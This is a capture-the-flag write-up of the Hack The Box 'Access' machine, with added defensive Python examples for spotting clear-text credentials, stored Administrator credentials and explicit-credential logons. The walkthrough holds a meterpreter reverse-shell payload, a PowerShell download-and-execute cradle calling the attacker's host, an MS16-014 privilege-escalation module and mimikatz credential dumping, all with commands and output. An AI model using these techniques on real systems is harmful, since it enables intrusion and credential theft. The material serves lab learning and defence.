Tags: hack the box, windows, runas, mimikatz
If you didn’t know, egre55 has put out a lot of boxes for HTB. Access is another egre55 machine that I thoroughly enjoyed (the other egre55 box I have a write-up for is Reel, which I highly recommend for learning some Active Directory techniques). I was fortunate enough to solve it using what I assume to be the intended method. However, the real learning for me happened on my second time through. Encrypting File System (EFS) was a completely foreign concept to me (not surprising if you know that I have a strong preference for Linux). I enjoyed digging into EFS and what use of EFS means for us as hackers. As usual, @egre55 put out an awesome box!
As usual, we start off with a masscan followed by a targeted nmap.
masscan -e tun0 -p0-65535,U:0-65535 --rate 700 -oL scan.10.10.10.105.all 10.10.10.105
═════════════════════════════════════════════════════════════════════════════════════
open tcp 80 10.10.10.98 1538253209
open tcp 23 10.10.10.98 1538253316
open tcp 21 10.10.10.98 1538253330
nmap -p 21,23,80 -sC -sV -oN nmap.scan 10.10.10.98
══════════════════════════════════════════════════
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Our nmap scan reports that anonymous ftp is allowed, so that’s an easy first step to see what’s being offered by ftp.
We can recursively download the contents of the ftp server using wget. After grabbing the ftp server contents, the command will drop them into a folder of the same name as the hostname used in the command (10.10.10.98 in this case).
wget --no-passive-ftp -r ftp://anonymous:epi@10.10.10.98/
After the wget, we’re left with the following directory structure locally.
find 10.10.10.98/
═════════════════
10.10.10.98/
10.10.10.98/Backups
10.10.10.98/Backups/backup.mdb
10.10.10.98/Engineer
10.10.10.98/Engineer/Access Control.zip
We can try to unzip Access Control.zip; however, it is password protected. This leaves us with backup.mdb, which is a Microsoft Access database. Let’s see if there’s anything of interest there.
First, let’s grab some software that understands how to read an Access database; enter kexi.
KEXI is an open source visual database applications creator, a long-awaited competitor for programs like MS Access or Filemaker.
apt install kexi
-------------8<-------------
kexi-3.1 backup.mdb
After opening backup.mdb with kexi, we’re met with a few prompts. We’ll click through these, generally accepting or nexting whatever pops up until we are able to click Finish. Once the steps to import the project (all those clicks) are complete, we’re greeted with the screen depicted below.
Within kexi, after some exploration we see the auth_user table and find the following usernames and passwords, of which engineer sounds promising.
Armed with a likely password, it’s time to revisit the password protected zip file. Linux’s unzip utility complains of an unsupported compression method, so let’s try it with 7-Zip.
7z x Access\ Control.zip
# pass: access4u@security
The zip uncompresses to reveal Access Control.pst, an Outlook PST file.
Similar to the previous step, now we need to find some tool that can process PST files on Linux. The pst-utils package has a tool, readpst, that works very nicely here.
apt install pst-utils
-------------8<-------------
readpst -D -r Access\ Control.pst
readpst options used:
-D    Include deleted items in the output.
-r    Changes the output format to Recursive... will put all emails in a file called "mbox".
The command above will create an mbox file that we can read using the cat command. We’re rewarded for our efforts with a username and password!
Access Control.mbox
═══════════════════
-------------8<-------------
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
-------------8<-------------
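The mbox above is exactly the kind of export a defender would sweep for clear-text credentials, since a password mailed around in plain text is one reset away from the next compromise. The following is an added example, not part of the original write-up: a small scanner built on Python’s standard mailbox module that walks every message in an mbox file and flags phrasings such as "password ... has been changed to". The mailbox content (including the placeholder password Example-Passw0rd! and the addresses) is constructed for the example and is not the box’s PST.

```python
import mailbox
import re
import tempfile
from pathlib import Path

# Constructed sample mailbox (not the PST from the box): one message that discloses
# a password in clear text and one that does not.
SAMPLE_MBOX = """From john@megacorp.invalid Mon Aug 20 10:00:00 2018
From: John <john@megacorp.invalid>
To: security@megacorp.invalid
Subject: Account update
Date: Mon, 20 Aug 2018 10:00:00 +0000

Hi there,
The password for the "security" account has been changed to Example-Passw0rd!.
Please ensure this is passed on to your engineers.

Regards,
John

From ops@megacorp.invalid Mon Aug 20 11:00:00 2018
From: Ops <ops@megacorp.invalid>
To: security@megacorp.invalid
Subject: Maintenance window
Date: Mon, 20 Aug 2018 11:00:00 +0000

The file server will be rebooted on Friday at 18:00.
"""

# Phrasings that commonly accompany a credential disclosed in clear text.
DISCLOSURE_PATTERNS = [
    re.compile(r"password\s+(?:for\s+.+?\s+)?(?:is|has been (?:changed|set) to|:)\s*(\S+)",
               re.IGNORECASE),
    re.compile(r"\b(?:pass|pwd|passwd)\s*[:=]\s*(\S+)", re.IGNORECASE),
]


def message_body(msg):
    """Return the decoded text of a message, joining all text/plain parts."""
    chunks = []
    for part in msg.walk():  # walk() yields the message itself first, then any sub-parts
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def find_credential_disclosures(mbox_path):
    """Scan every message in an mbox file; return (subject, sender, matched text) per hit."""
    hits = []
    box = mailbox.mbox(mbox_path)
    try:
        for msg in box:
            body = message_body(msg)
            for pattern in DISCLOSURE_PATTERNS:
                for m in pattern.finditer(body):
                    hits.append((msg["Subject"], msg["From"], m.group(0).strip()))
    finally:
        box.close()
    return hits


def scan_sample():
    """Write the constructed mailbox to a temporary file and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = Path(tmp) / "export.mbox"
        path.write_text(SAMPLE_MBOX, encoding="utf-8")
        return find_credential_disclosures(str(path))


if __name__ == "__main__":
    for subject, sender, text in scan_sample():
        print(f"[!] {sender} / {subject}: {text}")
```

Pointed at the readpst output instead of the constructed file, find_credential_disclosures would raise the same message John sent; the patterns are deliberately narrow, so tune them to the phrasing your organisation actually uses before relying on the results.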
Now that we have a username and password, it’s time to login!
# user: security
# pass: 4Cc3ssC0ntr0ller
telnet 10.10.10.98
-------------8<-------------
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
\o/ - access level: security
During enumeration, cmdkey lists out some interesting information, specifically that there are stored credentials that are available for use!
cmdkey /list
════════════
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
Even though we can’t dump these credentials or see what they are, we can use them directly with the runas command. There are a lot of ways to leverage this, but a meterpreter shell is pretty simple to execute, so we’ll take that approach. To get the exe to target, we can use a method I really like to transfer files to/from kali and windows.
First generate the exe with msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=12345 -f exe -o meter-rev-12345.exe
Next, spin up an smb server on kali pointed at the directory where the exe resides.
impacket-smbserver epi /root/htb/access
On target, simply copy the file from kali using a normal UNC path.
C:\Users\security> copy \\10.10.14.77\epi\meter-rev-12345.exe
copy \\10.10.14.77\epi\meter-rev-12345.exe
1 file(s) copied.
Spin up a listener on kali.
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 12345
lport => 12345
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.77:12345
Finally, on target, use the cached credentials to execute the reverse shell.
C:\Users\security> runas /savecred /user:ACCESS\Administrator .\meter-rev-12345.exe
We’ll wrap it up with a quick demonstration of running powershell commands from meterpreter.
meterpreter > getuid
Server username: ACCESS\Administrator
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute "get-content C:\users\administrator\desktop\root.txt | measure -character"
[+] Command execution completed:
Lines Words Characters Property
----- ----- ---------- --------
32
\o/ - administrator access
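From the defender’s side, both halves of what just happened are observable: a privileged credential sitting in the Credential Manager of a low-privilege account shows up in cmdkey /list, and runas supplying that credential writes Security event 4648 ("A logon was attempted using explicit credentials"). The block below is an added example in Python, not code from the write-up: parse_cmdkey_list reads cmdkey /list output in the format shown above and stored_privileged_credentials reports stored domain passwords for privileged accounts, while find_suspicious_logons runs over constructed 4648 records flattened to Key=Value pairs and surfaces a non-admin subject logging on as Administrator. The record layout, the generic credential entry and the svc_backup account are constructed for the example.

```python
import re

PRIVILEGED_ACCOUNTS = {"administrator"}


def parse_cmdkey_list(text):
    """Parse `cmdkey /list` output into a list of dicts with target/type/user keys."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Target:"):
            current = {"target": line.split(":", 1)[1].strip()}
            entries.append(current)
        elif current is not None and line.startswith(("Type:", "User:")):
            key, value = line.split(":", 1)
            current[key.lower()] = value.strip()
    return entries


def stored_privileged_credentials(cmdkey_output):
    """Return stored Domain Password entries whose user is a privileged account."""
    hits = []
    for entry in parse_cmdkey_list(cmdkey_output):
        account = entry.get("user", "").rsplit("\\", 1)[-1].lower()
        if entry.get("type") == "Domain Password" and account in PRIVILEGED_ACCOUNTS:
            hits.append(entry)
    return hits


# Constructed sample in the cmdkey /list layout seen on the box (the second entry is made up).
SAMPLE_CMDKEY = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: security
"""

# Constructed Security events flattened to Key=Value pairs (not a real export).
# 4648 is written when runas / CreateProcessWithLogonW supply credentials for another account.
SAMPLE_EVENTS = [
    "EventID=4648 SubjectUserName=security SubjectDomainName=ACCESS TargetUserName=Administrator "
    "TargetDomainName=ACCESS TargetServerName=localhost ProcessName=C:\\Windows\\System32\\runas.exe",
    "EventID=4648 SubjectUserName=svc_backup SubjectDomainName=ACCESS TargetUserName=svc_backup "
    "TargetDomainName=ACCESS TargetServerName=fileserver ProcessName=C:\\Windows\\System32\\svchost.exe",
    "EventID=4624 SubjectUserName=- SubjectDomainName=- TargetUserName=security "
    "TargetDomainName=ACCESS LogonType=2 ProcessName=C:\\Windows\\System32\\tlntsvr.exe",
    "EventID=4648 SubjectUserName=Administrator SubjectDomainName=ACCESS TargetUserName=Administrator "
    "TargetDomainName=ACCESS TargetServerName=localhost ProcessName=C:\\Windows\\System32\\runas.exe",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened 'Key=Value ...' record into a dict."""
    return dict(FIELD_RE.findall(line))


def explicit_logon_reason(event):
    """Return why a 4648 event deserves a look, or None if it looks benign."""
    if event.get("EventID") != "4648":
        return None
    subject = event.get("SubjectUserName", "").lower()
    target = event.get("TargetUserName", "").lower()
    if subject == target:
        return None  # an account re-authenticating as itself (e.g. a service using its own creds)
    if target in PRIVILEGED_ACCOUNTS:
        proc = event.get("ProcessName", "").rsplit("\\", 1)[-1]
        return f"{subject} used explicit credentials for {target} via {proc}"
    return None


def find_suspicious_logons(lines):
    """Run the 4648 check over flattened event lines; return (event, reason) pairs."""
    found = []
    for event in map(parse_event, lines):
        reason = explicit_logon_reason(event)
        if reason:
            found.append((event, reason))
    return found


if __name__ == "__main__":
    for entry in stored_privileged_credentials(SAMPLE_CMDKEY):
        print("[!] stored privileged credential:", entry["target"])
    for _, reason in find_suspicious_logons(SAMPLE_EVENTS):
        print("[!]", reason)
```

On a real host the same functions would be fed the output of cmdkey /list and 4648 events pulled with wevtutil qe Security /q:"*[System[EventID=4648]]" /f:text (after flattening the EventData fields into the Key=Value form the parser expects). The fix for the finding itself is the policy "Network access: Do not allow storage of passwords and credentials for network authentication" plus not leaving Administrator credentials saved in a low-privilege profile in the first place.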
There is a second way to root this machine. It’s not interesting for the exploit itself, because it’s really just a few metasploit modules strung together. However, it IS interesting for what it teaches. I only found out about this because some people were asking questions about why they couldn’t view root.txt as SYSTEM in NetSec Focus chat. So, while this is a method to get SYSTEM on the box, it is not a method to get root.txt unless someone before us has used the stored credentials discussed above.
Restarting our process from the point where we logged in through telnet, we can get a meterpreter shell by using the web delivery module.
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set srvport 8081
srvport => 8081
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set lhost tun0
lhost => tun0
msf5 exploit(multi/script/web_delivery) > set lport 12345
lport => 12345
msf5 exploit(multi/script/web_delivery) > exploit -j
[*] Local IP: http://192.168.100.234:8081/ovuR3ArPYFio
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://10.10.14.77:8081/ovuR3ArPYFio');
With the listener running, we need to copy/paste the powershell command above into the target window.
C:\Users\security\Documents>powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://10.10.14.77:8081/6ORXQO');
After running the above command on target, we receive a meterpreter callback in msfconsole.
This machine is vulnerable to MS16-014 (Microsoft Windows WMI - Receive Notification Exploit). We can use our existing meterpreter session to get a SYSTEM shell on target using the corresponding metasploit module.
msf5 exploit(multi/script/web_delivery) > use windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
[*] Started reverse TCP handler on 10.10.14.77:4444
[*] Launching notepad to host the exploit...
[+] Process 2372 launched.
[*] Reflectively injecting the exploit DLL into 2372...
[*] Injecting exploit into 2372...
[*] Exploit injected. Injecting payload into 2372...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 2 opened (10.10.14.77:4444 -> 10.10.10.98:49170) at 2018-10-04 19:10:44 -0500
C:\Users\security> whoami
nt authority\system
\o/ - SYSTEM access
If our primary goal was strictly flags, a SYSTEM shell on this target wouldn’t actually help us. This is because root.txt is encrypted using EFS. EFS is a part of NTFS and it provides the ability to encrypt files and folders, instead of a whole drive.
Even with a SYSTEM shell, we can’t view the contents of root.txt as illustrated below.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
ACCESS\Administrator:(I)(F)
Successfully processed 1 files; Failed processing 0 files
A box creator with a penchant for trolling may have created a root.txt whose contents are “Access is denied.” (take notes incidrthreat) However, this is not the case, and the cipher command can show us that it is indeed encrypted.
C:\Users\Administrator\Desktop>cipher
cipher
Listing C:\Users\Administrator\Desktop\
New files added to this directory will not be encrypted.
E root.txt
Files encrypted with EFS can only be decrypted by using the RSA private key(s) matching the previously used public key(s). The stored copy of the user’s private key is ultimately protected by the user’s logon password.
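To make that last sentence concrete, here is an added toy model of the EFS key hierarchy in Python (an illustration written for this write-up, not Windows’ implementation): each file gets its own File Encryption Key (FEK); the FEK is stored with the file encrypted under the user’s key (the DDF entry); and the user’s key is itself held only in a form sealed with a key derived from the logon password (the role DPAPI’s master key plays for the RSA private key). RSA is replaced by a symmetric stand-in and the cipher is a SHA-256 keystream with an HMAC tag so the model runs with the standard library only; the password and file contents are constructed. The demo shows why a SYSTEM shell with Full Control on root.txt gets only ciphertext, while anyone holding the Administrator’s logon password unlocks the chain end to end.

```python
import hashlib
import hmac
import os

# Toy model of the EFS key hierarchy (an added illustration, not Windows' implementation):
#   file contents -> encrypted under a per-file File Encryption Key (FEK)
#   FEK           -> encrypted under the user's key and stored with the file (the DDF;
#                    real EFS uses the RSA public key from the user's EFS certificate)
#   user's key    -> stored only sealed with a key derived from the logon password
#                    (models the DPAPI master key protecting the RSA private key)


def keystream_xor(key, nonce, data):
    """CTR-style stream: XOR data with successive SHA-256(key || nonce || counter) blocks."""
    out = bytearray()
    for counter, start in enumerate(range(0, len(data), 32)):
        block = hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[start:start + 32], block))
    return bytes(out)


def seal(key, plaintext):
    """Encrypt-then-MAC, so a wrong key is detected instead of yielding garbage."""
    nonce = os.urandom(16)
    ciphertext = keystream_xor(key, nonce, plaintext)
    tag = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def unseal(key, blob):
    nonce, ciphertext, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise PermissionError("key does not match: wrong logon password or no access to the user's key")
    return keystream_xor(key, nonce, ciphertext)


def derive_master_key(password, salt):
    """Logon password -> master key (PBKDF2 here; DPAPI has its own derivation)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class EfsUser:
    """A user profile whose key exists only in password-sealed form."""

    def __init__(self, password):
        self.salt = os.urandom(16)
        self.protected_user_key = seal(derive_master_key(password, self.salt), os.urandom(32))

    def unlock_user_key(self, password):
        return unseal(derive_master_key(password, self.salt), self.protected_user_key)


def efs_encrypt(user, password, plaintext):
    """Return (ciphertext, wrapped_fek): the file under a fresh FEK, the FEK under the user's key."""
    fek = os.urandom(32)
    return seal(fek, plaintext), seal(user.unlock_user_key(password), fek)


def efs_decrypt(user, password, ciphertext, wrapped_fek):
    fek = unseal(user.unlock_user_key(password), wrapped_fek)
    return unseal(fek, ciphertext)


def demo():
    """Constructed scenario: Administrator encrypts root.txt; SYSTEM has the bytes, not the password."""
    admin_password = "correct horse battery staple"  # constructed, not the box's password
    admin = EfsUser(admin_password)
    flag = b"flag{constructed-example}\n"
    ciphertext, wrapped_fek = efs_encrypt(admin, admin_password, flag)

    # SYSTEM: Full Control on the file yields the ciphertext and the DDF, but no logon password.
    try:
        efs_decrypt(admin, "", ciphertext, wrapped_fek)
        system_can_read = True
    except PermissionError:
        system_can_read = False

    # Whoever knows the Administrator's logon password (the owner, or someone who recovered
    # it from LSASS after it was used) can unlock the user's key, then the FEK, then the file.
    owner_can_read = efs_decrypt(admin, admin_password, ciphertext, wrapped_fek) == flag
    return system_can_read, owner_can_read


if __name__ == "__main__":
    print("SYSTEM can read: %s, owner can read: %s" % demo())
```

The model also explains the operational footnote that follows: file ACLs are irrelevant to EFS, the logon password is the root of the chain, and so the practical exposure is whatever keeps that password (or the unlocked private key) in memory.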
This technique only works if someone else has actually utilized the stored credentials with runas or something similar. We’ll look at mimikatz run against a freshly reverted box and against one where we used the stored credentials.
Keeping with our meterpreter theme for this machine, we’ll upgrade our SYSTEM cmd shell to a meterpreter shell.
First, a quick sessions -u 2 will net us a 32-bit meterpreter shell.
msf exploit(windows/local/ms16_014_wmi_recv_notif) > sessions -u 2
-------------8<-------------
meterpreter x86/windows NT AUTHORITY\SYSTEM @ ACCESS 10.10.14.77:4433 -> 10.10.10.98:49161 (10.10.10.98)
-------------8<-------------
Then, we need a 64-bit meterpreter to run mimikatz, so we can use the payload_inject module to accomplish that.
msf exploit(windows/local/ms16_014_wmi_recv_notif) > use windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set session 3
msf5 exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/payload_inject) > set lhost tun0
msf5 exploit(windows/local/payload_inject) > set lport 12346
msf5 exploit(windows/local/payload_inject) > exploit
-------------8<-------------
[*] Meterpreter session 4 opened (10.10.14.77:12346 -> 10.10.10.98:49195) at 2018-10-05 09:28:04 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
This is what mimikatz is able to gather for us on a freshly reverted instance of the box.
meterpreter > load kiwi
Loading extension kiwi...
-------------8<-------------
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
-------------8<-------------
security ACCESS 4Cc3ssC0ntr0ller
-------------8<-------------
After performing a command using the stored credentials like we did in the runas section, we can clearly see the Administrator account’s password.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
-------------8<-------------
Administrator ACCESS 55Acc3ssS3cur1ty@megacorp
security ACCESS 4Cc3ssC0ntr0ller
-------------8<-------------
With the Administrator’s password, we can log in via telnet again and check out root.txt without issue.
# user: Administrator
# pass: 55Acc3ssS3cur1ty@megacorp
telnet 10.10.10.98
-------------8<-------------
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>powershell -c "cat desktop\root.txt | measure -character"
Lines Words Characters Property
----- ----- ---------- --------
32
There we have it: if the credentials have been used recently, this method leads to a flag, but that definitely was not the case for some folks.
I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.